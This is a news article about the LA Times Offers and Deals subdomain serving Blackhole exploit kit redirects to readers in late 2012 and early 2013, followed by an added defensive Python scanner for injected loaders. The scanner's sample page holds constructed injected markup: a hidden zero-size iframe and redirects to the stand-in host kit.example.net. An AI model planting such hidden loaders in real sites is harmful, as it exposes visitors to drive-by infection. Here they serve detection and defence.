The Los Angeles Times has scrubbed its Web site of malicious code that served browser exploits and malware to potentially hundreds of thousands of readers over the past six weeks.
On Feb. 7, KrebsOnSecurity heard from two different readers that a subdomain of the LA Times’ news site (offersanddeals.latimes.com) was silently redirecting visitors to a third-party Web site retrofitted with the Blackhole exploit kit. I promptly asked my followers on Twitter if they had seen any indications that the site was compromised, and in short order heard from Jindrich Kubec, director of threat intelligence at Czech security firm Avast.
Kubec checked Avast’s telemetry with its user base, and discovered that the very same LA Times subdomain was indeed redirecting visitors to a Blackhole exploit kit, and that the data showed this had been going on since at least December 23, 2012.
Contacted via email, LA Times spokeswoman Hillary Manning initially said a small number of users trying to access a subdomain of the site were instead served a malicious script warning on Feb. 2 and 3. But Manning said this was the result of a glitch in Google’s display ad exchange, not a malware attack on the company’s site.
“The LA Times, along with dozens of other Google ad exchange users including the New York Times, the Guardian, CNET, Huffington Post and ZDNet, were, to varying degrees, blocked by malicious script warnings,” Manning wrote in an email to KrebsOnSecurity. “The impacted sections of our site were quickly cleared and there was never any danger to users.”
Unfortunately, Avast and others continued to detect exploits coming from the news site. Manning subsequently acknowledged that the Google display ad issue was a separate and distinct incident, and that the publication’s tech team was working to address the problem.
It’s not clear how many readers may have been impacted by the attack, which appears to have been limited to the Offers and Deals page of the latimes.com Web site. Site metrics firm Alexa.com says this portion of the newspaper’s site receives about .12 percent of the site’s overall traffic, which according to the publication is about 18 million unique visitors per month. Assuming the site was compromised from Dec. 23, 2012 through the second week in February 2013, some 324,000 LA Times readers were likely exposed to the attack.
Security experts warn that the LA Times incident is unfortunately all-too-common. A report released this week by security and antivirus firm Sophos found that 80 percent of the Web sites where the company detects malicious content are innocent, legitimate sites that have been hacked.
Unlucky visitors who browse the hacked page with an outdated browser or outdated browser plugins can have their PCs silently infected with malware of the attacker’s choosing: the exploit kit probes the visitor’s software for known, unpatched flaws and delivers its payload without the reader clicking on anything.
The LA Times attack highlights the daily security challenges facing Web site owners and Internet users. Keeping your browser and operating system up-to-date with the latest patches is a great start, but it’s not enough on its own to keep you safe on the Web today: the browser plugins that exploit kits target (Java and Flash are the usual suspects) need the same attention, and, as this case shows, a trusted site can serve exploits for weeks without any visible sign to the reader.
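The silent redirect described above (a hidden iframe, an injected script or a meta refresh pointing at an attacker-controlled host) is something a site owner can check for directly rather than waiting for an antivirus vendor’s telemetry. The following scanner is an added example, not code from the original article and not the code that was injected into the LA Times subdomain. The sample page, the host `kit.example.net` and the function `find_offsite_loaders` are constructed for illustration; the checks assume the site’s own content lives on `latimes.com` and its subdomains, so anything loaded from elsewhere is reported.

```python
"""Scan an HTML page for injected off-site loaders: external iframes/scripts,
hidden iframes, meta-refresh redirects and inline window.location rewrites.

Added example. The sample page and the host kit.example.net below are
constructed for illustration and are not the code found on the LA Times site.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate on-site script plus three
# hypothetical injected loaders pointing at kit.example.net.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0;url=http://kit.example.net/land.php">
<script src="/static/app.js"></script>
</head><body>
<h1>Offers and Deals</h1>
<iframe src="http://kit.example.net/in.php" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>window.location = "http://kit.example.net/go";</script>
</body></html>"""

# Inline JavaScript that rewrites the page location to a literal URL.
LOCATION_RE = re.compile(
    r"""(?:window|document|top|self)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")
# The url=... part of a <meta http-equiv="refresh" content="0;url=..."> tag.
REFRESH_RE = re.compile(r"""url\s*=\s*['"]?([^'"\s;]+)""", re.I)


class LoaderScanner(HTMLParser):
    """Collects (finding_type, url) pairs for anything that loads or
    redirects to a host outside site_host and its subdomains."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script_text = []

    def _offsite(self, url):
        host = (urlparse(url).hostname or "").lower()
        # Relative URLs have no host and are on-site by definition.
        return bool(host) and host != self.site_host \
            and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._script_text = []
        if tag in ("iframe", "script", "embed", "object") \
                and a.get("src") and self._offsite(a["src"]):
            self.findings.append(("offsite-" + tag, a["src"]))
        if tag == "iframe":
            # Exploit-kit iframes are usually sized to zero or hidden via CSS.
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = a.get("width") in ("0", "1") or a.get("height") in ("0", "1") \
                or "display:none" in style or "visibility:hidden" in style
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = REFRESH_RE.search(a.get("content") or "")
            if m and self._offsite(m.group(1)):
                self.findings.append(("meta-refresh", m.group(1)))

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            for m in LOCATION_RE.finditer("".join(self._script_text)):
                if self._offsite(m.group(1)):
                    self.findings.append(("inline-redirect", m.group(1)))


def find_offsite_loaders(html, site_host):
    """Return the list of (finding_type, url) pairs found in html."""
    scanner = LoaderScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, url in find_offsite_loaders(SAMPLE_PAGE, "latimes.com"):
        print(f"{kind:16} {url}")
```

Run against a page fetched from the site, every hit needs to be compared with what the site is supposed to load: ad networks and CDNs will show up as off-site scripts too, so the useful signal is a new host that was not in yesterday’s baseline, or any hidden iframe at all. Fetching the page from an outside network matters as well, because injected code is sometimes served only to visitors who do not look like the site’s own staff.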
Update, 1:17 p.m. ET: In response to this story, The Los Angeles Times just released the following statement: “On February 6th the Los Angeles Times was made aware that malware was possibly being served by OffersandDeals.latimes.com. We quickly determined the problem was contained within the Offers & Deals sub-domain, which is maintained by a third party. Our forensics team undertook what is now an ongoing investigation and is working closely with the vendor to collect evidence surrounding the event. To ensure safety, the Offers & Deals platform has been rebuilt and further secured. The sub-domain generates only advertising content and does not contain any customer information. As a trusted source of news and information, The Times takes matters of internet security very seriously and is pleased to report that there is no malware currently detectable on Offers & Deals.”